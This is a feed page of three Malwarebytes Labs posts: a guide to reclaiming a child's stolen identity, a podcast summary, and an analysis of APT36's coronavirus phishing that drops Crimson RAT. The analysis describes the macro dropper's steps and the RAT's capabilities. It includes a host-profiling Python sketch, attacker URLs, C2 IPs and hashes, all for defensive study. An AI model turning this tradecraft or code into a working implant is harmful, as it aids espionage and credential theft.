Child identity theft, part 2: How to reclaim your child’s identity

Malwarebytes - Tue, 03/17/2020 - 16:33

In a world where children as young as a single day old can fall prey to fraud, it is more important than ever to educate parents and other caretakers about the dangers of child identity theft. While the hope is that perceptions can be changed and criminals brought to justice, likely the biggest concern for parents is how to reclaim their child’s identity, should they ever be in such an unfortunate position.

That is, unless the parents or guardians are the ones behind the fraud in the first place. In part 1 of our series on child identity theft, we talked about familiar fraud—fraud committed by someone who personally knows the victim—and how children are increasingly being targeted for this crime. We also touched on the repercussions of familiar fraud in the lives of kids and their families.

In part 2 of our series, we look at turning the tables and reclaiming your child’s identity, whether it was stolen by a stranger or by someone who knows them. In addition, we highlight the signs that your child’s information might be compromised and how parents or guardians can better protect their data.

Signs of child identity compromise

When it comes to figuring out if a child’s identity has been compromised and is being used, thankfully, there are telltale signs that parents and guardians can look out for. These signs are displayed both in the real world and the digital world. They include:

  • Physical mail arriving at your home that is addressed to your child. This includes credit card applications, banking statements, and insurance applications for accounts under their name, and it’s the most obvious sign of compromise. Your child may also receive a notice from the IRS, either because of unpaid income taxes or because multiple tax returns were filed under their SSN.
  • Phone calls received from collection agencies directed to your child.
  • If the landline has a caller ID, your child’s name may appear on it. This indicates that someone has stolen and is misusing their information.
  • A turned-down application for a government benefit for your child. This can happen because someone with the same SSN as your child is already receiving it.
  • Bank turning down an account application for a child due to the negative credit score associated with the child’s SSN.
  • Important documents of your child suddenly going missing, including their SSN card and birth certificate.
  • In addition, the Identity Theft Resource Center (ITRC) has listed several documents that may suddenly show up—or, in certain cases, not show up—that potentially give away active ID theft activity.
How to reclaim your child’s identity

Reclaiming a stolen identity takes a lot of work. This is true whether the victim is an adult or a child. And the length of time spent undoing the harm to your child’s reputation potentially correlates with how long the fraud has been taking place before it was identified and acted upon.

If you, dear parent or guardian, have seen any of these telltale signs of identity fraud, immediately contact the major credit bureaus to freeze your child’s credit until they are old enough to enter into a contract. Doing so takes their credit reports out of circulation.

A credit report for a child is normally nonexistent, but if one is found, the parent or guardian should contact an organization that deals with child identity theft, such as the Identity Theft Resource Center (ITRC). A parent who simply wants to take extra precautions can ask the credit reporting agencies (CRAs)—Experian, Equifax, and TransUnion, or other smaller bureaus—to create a credit report for their child and freeze it.

It is equally important for parents and guardians to keep the PIN that each of these credit bureaus assigns to them, as it is needed to lift the freeze later.

Beyond freezing and receiving credit reports, other important steps for reclaiming your child’s identity include:

  • Contacting any companies where fraudulent accounts were opened in your child’s name. Tell the fraud department what happened, and ask them to close the account and send a letter confirming your child isn’t liable. If necessary, send a letter explaining that your child is a minor who can’t enter into contracts, and attach a copy of their birth certificate.
  • For parents in the United States, contacting the Federal Trade Commission (FTC) at IdentityTheft.gov or calling 877-ID-THEFT to report the fraud.
How to protect your child’s identity

In the Experian survey report mentioned in part 1 of our series, more than half of victims (63 percent) wished that their parents had done more to protect them from potential fraud. Interestingly, 61 percent of parents felt the same way.

Parents should actively cultivate awareness of the risks and underlying dangers of child identity theft. To avoid giving fraudsters an opening to take advantage of your child’s information, here are some tips:

  • Don’t carry your child’s SSN card. There is no need—keep it safe at home instead.
  • Know when your child’s SSN is truly required when applying for something on their behalf. Schools, for example, don’t need a child’s SSN, so there is no need to provide it.
  • When throwing out mail or documents containing your personal information or your child’s, shred them first.
  • You may also want to consider getting your child another form of identification, such as a passport or a state identification card.
  • If you receive news of your child’s school getting breached, don’t hesitate to call the school and ask for more information.
  • Inquire about your child’s school directory information policy. Directory information contains a lot of personally identifiable information (PII) about a child, and it is sometimes shared outside the school. Parents and guardians can either inform the school that it shouldn’t share their child’s information without their express consent, or opt out of having the information shared.
  • Keep all important documents of your child in a safe and secure place.

Early detection is key. Getting acquainted with these red flags and keeping an eye out for them can nip fraud in the bud. It also makes reclaiming and restoring a child’s identity a little easier—emotionally, mentally, and financially.

Half of Experian respondents with children who have been victimized by fraud have learned the hard way not to share personal information with family. Some have also started actively checking credit scores and enrolling for identity theft protection services.

The things we leave behind

It’s easy for adults to forget that, like them, children have data and information that need protecting, too. Even children too young to use a computing device already have digital footprints. The reason? Mom and Dad or other legal guardians leave them behind. Unfortunately, that is unavoidable.

Mom needs to schedule a doctor’s appointment for the little one’s check-up, so she uses her healthcare app. Proud dad shares short clips of his bundle of joy with Aunt Martha, who lives far away and couldn’t visit the newborn in hospital. And before all of this, Mom and Dad announced the pregnancy to all their social media channels.

Sadly, the very activities that give us joy and make tasks convenient can also leave behind breadcrumbs that identity thieves can sniff out and follow. Rarely do parents or guardians stop to think about how their sharing can impact their child’s digital life.

Take, for example, baby pictures you may have shared on social media. They may contain metadata pointing to the location where they were taken. Or when you made that public announcement about your baby on the way: did you also reveal their name? From this information, fraudsters can easily glean the baby’s full name and location. If they don’t yet have the child’s SSN, they can pair these details with a stolen or fabricated SSN to create a synthetic identity.
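To see how little effort location recovery takes, consider how EXIF stores GPS coordinates: as degrees, minutes, and seconds plus a hemisphere reference. The minimal Python sketch below (the sample values are hypothetical, and pulling the raw GPSInfo tags from a photo would normally be done with a metadata tool or library) converts them into the decimal coordinates any map application accepts:

```python
# Illustrative sketch: EXIF GPS data is stored as degrees/minutes/seconds
# values plus an "N"/"S" or "E"/"W" reference. Converting them to decimal
# coordinates shows how easily a photo's location can be recovered.

def dms_to_decimal(degrees, minutes, seconds, ref):
    """Convert EXIF-style DMS coordinates to a signed decimal degree."""
    decimal = degrees + minutes / 60 + seconds / 3600
    # Southern and western hemispheres are negative
    return -decimal if ref in ("S", "W") else decimal

# Hypothetical GPSInfo values, as a metadata tool might report them
lat = dms_to_decimal(40, 44, 54.36, "N")
lon = dms_to_decimal(73, 59, 8.36, "W")
print(f"Photo taken near: {lat:.5f}, {lon:.5f}")
```

Major social networks typically strip EXIF data on upload, but files shared directly (email, cloud drives, some messengers) often keep it, so it is worth stripping metadata yourself before sharing.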

This isn’t to say that parents and guardians should deprive relatives and friends of their little one’s adorable moments, or avoid entering any of their children’s information online—just be mindful when doing so. Share privately by making use of your social network’s privacy settings, and remind relatives and friends not to re-share media you post without your consent.

We’re all in this together

In this age of data breaches, it is easy for us to focus on the security of our own data. But let us be aware that kids and young adults are becoming targets, too. Children, especially, are blank slates—a highly prized quality for someone with access to their information and with malicious intent. Hackers are after them, yet often it’s those closest to them who cause the greatest harm—sometimes without knowing they are doing it. Worse, more than one person could be fraudulently using an innocent child’s identity.

While parents and guardians are advised to be just as vigilant in protecting the data of their children—biological and adopted—as their own, we encourage every other responsible adult in the family to take part. If familiar fraud becomes a family problem, then thwarting it should be a family affair, for the sake of the most vulnerable in the household.

The post Child identity theft, part 2: How to reclaim your child’s identity appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Lock and Code S1Ep2: On the challenges of managed service providers

Malwarebytes - Mon, 03/16/2020 - 15:28

This week on Lock and Code, we discuss the top security headlines generated right here on Labs and around the Internet. In addition, we talk to two representatives from an Atlanta-based managed service provider—a manager of engineering services and a data center architect—about the daily challenges of managing thousands of nodes and the future of the industry.

Tune in for all this and more on the latest episode of Lock and Code, with host David Ruiz.

You can also find us on the Apple iTunes store, on Google Play Music, or on whatever podcast platform you prefer.

We cover our own research on:
  • International Women’s Day: Is awareness of stalkerware, monitoring, and spyware apps on the rise?
  • How a Rocket Loader skimmer impersonates the CloudFlare library in a clever scheme
  • Securing the MSP: What are the best practices for vetting cybersecurity vendors?
  • Remote security, aka RemoteSec, and how to achieve on-prem security levels with cloud-based remote teams
  • How the coronavirus has impacted security conferences and events, including which were cancelled, postponed, or switched over to virtual
  • The effects of climate change on cybersecurity
Plus, other cybersecurity news:
  • FBI warning: Hackers are targeting Office 365, G Suite users with business email compromise attacks. (Source: SiliconAngle)
  • How poor IoT security is allowing the 12-year-old Conficker malware to make a comeback. (Source: ZDNet)
  • Recently discovered spear phishing emails are using HIV test results as a scare factor. (Source: ThreatPost)
  • Talkspace threatened to sue a security researcher over a bug report, and forced him to take down a blog post. (Source: TechCrunch)
  • Independent testing found Google’s Play Protect to be poor on malware protection. (Source: Forbes)
  • Researchers found thousands of fingerprint files exposed in an unsecured database. (Source: Cnet)
  • Researchers discovered a phishing page informing victims about fake Netflix service disruptions, supposedly due to problems with the victim’s payment method. (Source: Sucuri Blog)

Stay safe, everyone!

The post Lock and Code S1Ep2: On the challenges of managed service providers appeared first on Malwarebytes Labs.

Categories: Techie Feeds

APT36 jumps on the coronavirus bandwagon, delivers Crimson RAT

Malwarebytes - Mon, 03/16/2020 - 15:00

Since the coronavirus became a worldwide health issue, the desire for more information and guidance from government and health authorities has reached a fever pitch. This is a golden opportunity for threat actors to capitalize on fear, spread misinformation, and generate mass hysteria—all while compromising victims with scams or malware campaigns.

Profiting from global health concerns, natural disasters, and other extreme weather events is nothing new for cybercriminals. Scams related to SARS, H1N1 (swine flu), and avian flu have circulated online for more than a decade. According to reports from ZDNet, many state-sponsored threat actors have already started to distribute coronavirus lures, including:

  • Chinese APTs: Vicious Panda, Mustang Panda
  • North Korean APTs: Kimsuky
  • Russian APTs: Hades group (believed to have ties with APT28), TA542 (Emotet)
  • Other APTs: Sweed (Lokibot)

Recently, the Red Drip team reported that APT36 was using a decoy health advisory document to spread a Remote Administration Tool (RAT).

APT36 is believed to be a Pakistani state-sponsored threat actor that mainly targets the defense sector, embassies, and the government of India. APT36 performs cyber-espionage operations with the intent of collecting sensitive information from India that supports Pakistani military and diplomatic interests. This group, active since 2016, is also known as Transparent Tribe, ProjectM, Mythic Leopard, and TEMP.Lapis.

APT36 spreads fake coronavirus health advisory

APT36 relies on both spear phishing and watering hole attacks to gain a foothold on victims’ machines. The phishing email carries either a malicious macro document or an RTF file exploiting vulnerabilities such as CVE-2017-0199.

In the coronavirus-themed attack, APT36 used a spear phishing email with a link to a malicious document (Figure 1) masquerading as the government of India (email.gov.in.maildrive[.]email/?att=1579160420).

Figure 1: Phishing document containing malicious macro code

We looked at the previous phishing campaigns related to this APT and can confirm this is a new phishing pattern from this group. The names used for directories and functions are likely Urdu names.

The malicious document has two hidden macros that drop a RAT variant called Crimson RAT. The malicious macro (Figure 2) first creates two directories with the names “Edlacar” and “Uahaiws” and then checks the OS type.

Figure 2: malicious macro

Based on the OS type, the macro picks either a 32-bit or 64-bit version of its RAT payload, stored in ZIP format in one of the two textboxes in UserForm1 (Figure 3).

Figure 3: embedded payloads in ZIP format

Then it drops the ZIP payload into the Uahaiws directory, unzips its content using the “UnAldizip” function, and drops the RAT payload into the Edlacar directory. Finally, it calls the Shell function to execute the payload.

Crimson RAT

Crimson RAT is written in .NET (Figure 4), and its capabilities include:

  • Stealing credentials from the victim’s browser
  • Listing running processes, drives, and directories on the victim’s machine
  • Retrieving files from its C&C server
  • Using a custom TCP protocol for its C&C communications
  • Collecting information about antivirus software
  • Capturing screenshots
Figure 4: Crimson RAT

Upon running the payload, Crimson RAT connects to its hardcoded C&C IP addresses and sends collected information about the victim back to the server, including a list of running processes and their IDs, the machine hostname, and its username (Figure 5).
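The host profile sent on check-in is nothing exotic. The hedged Python sketch below is illustrative only—Crimson RAT is a .NET implant, and this is not its actual code—but it shows how little is needed to collect the same hostname, username, and OS details using only standard-library calls:

```python
import getpass
import platform
import socket

# Illustrative only: not Crimson RAT's code. This simply demonstrates that
# the check-in details a RAT reports (hostname, username, OS version) are
# trivially available through standard-library calls on any machine.
def host_profile() -> dict:
    return {
        "hostname": socket.gethostname(),
        "username": getpass.getuser(),
        "os": platform.platform(),
    }

print(host_profile())
```

Because this data is so cheap to gather, defenders should treat unexpected outbound connections carrying host details to unknown IPs as a strong signal, rather than relying on spotting the collection itself.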

Figure 5: TCP communications

Ongoing use of RATs

APT36 has used many different malware families in the past, but has mostly deployed RATs, such as BreachRAT, DarkComet, Luminosity RAT, and njRAT.

In past campaigns, the group compromised Indian military and government databases to steal sensitive data, including army strategy and training documents, tactical documents, and other official letters. It also stole personal data, such as passport scans, personal identification documents, text messages, and contact details.

Protection against RATs

While most general users needn’t worry about nation-state attacks, organizations wanting to protect against this threat should consider using an endpoint protection system or endpoint detection and response with exploit blocking and real-time malware detection.

Shoring up vulnerabilities by keeping all software (including Microsoft Excel and Word) up-to-date shields against exploit attacks. In addition, training employees and users to avoid opening coronavirus resources from unvetted sources can protect against this and other social engineering attacks from threat actors.

Malwarebytes users are protected against this attack. We block the malicious macro execution as well as its payload with our application behavior protection layer and real-time malware detection.

Indicators of Compromise

Decoy URLs

email.gov.in.maildrive[.]email/?att=1579160420
email.gov.in.maildrive[.]email/?att=1581914657

Decoy documents

876939aa0aa157aa2581b74ddfc4cf03893cede542ade22a2d9ac70e2fef1656
20da161f0174d2867d2a296d4e2a8ebd2f0c513165de6f2a6f455abcecf78f2a

Crimson RAT

0ee399769a6e6e6d444a819ff0ca564ae584760baba93eff766926b1effe0010
b67d764c981a298fa2bb14ca7faffc68ec30ad34380ad8a92911b2350104e748

C2s

107.175.64[.]209
64.188.25[.]205

MITRE ATT&CK

https://attack.mitre.org/software/S0115/
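The file hashes above can be put to work directly. The minimal triage sketch below (an illustration, not a substitute for real endpoint protection) hashes file contents with SHA-256 and checks them against the indicators listed in this post:

```python
import hashlib

# SHA-256 indicators listed above (decoy documents and Crimson RAT payloads)
CRIMSON_IOCS = {
    "876939aa0aa157aa2581b74ddfc4cf03893cede542ade22a2d9ac70e2fef1656",
    "20da161f0174d2867d2a296d4e2a8ebd2f0c513165de6f2a6f455abcecf78f2a",
    "0ee399769a6e6e6d444a819ff0ca564ae584760baba93eff766926b1effe0010",
    "b67d764c981a298fa2bb14ca7faffc68ec30ad34380ad8a92911b2350104e748",
}

def matches_known_ioc(data: bytes, iocs: set = CRIMSON_IOCS) -> bool:
    """Return True if the SHA-256 of the given bytes matches a listed IoC."""
    return hashlib.sha256(data).hexdigest() in iocs
```

In practice you would stream files from disk in chunks and pull indicators from a regularly updated threat feed rather than a hardcoded set, since attackers can trivially change hashes by recompiling.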

The post APT36 jumps on the coronavirus bandwagon, delivers Crimson RAT appeared first on Malwarebytes Labs.

Categories: Techie Feeds
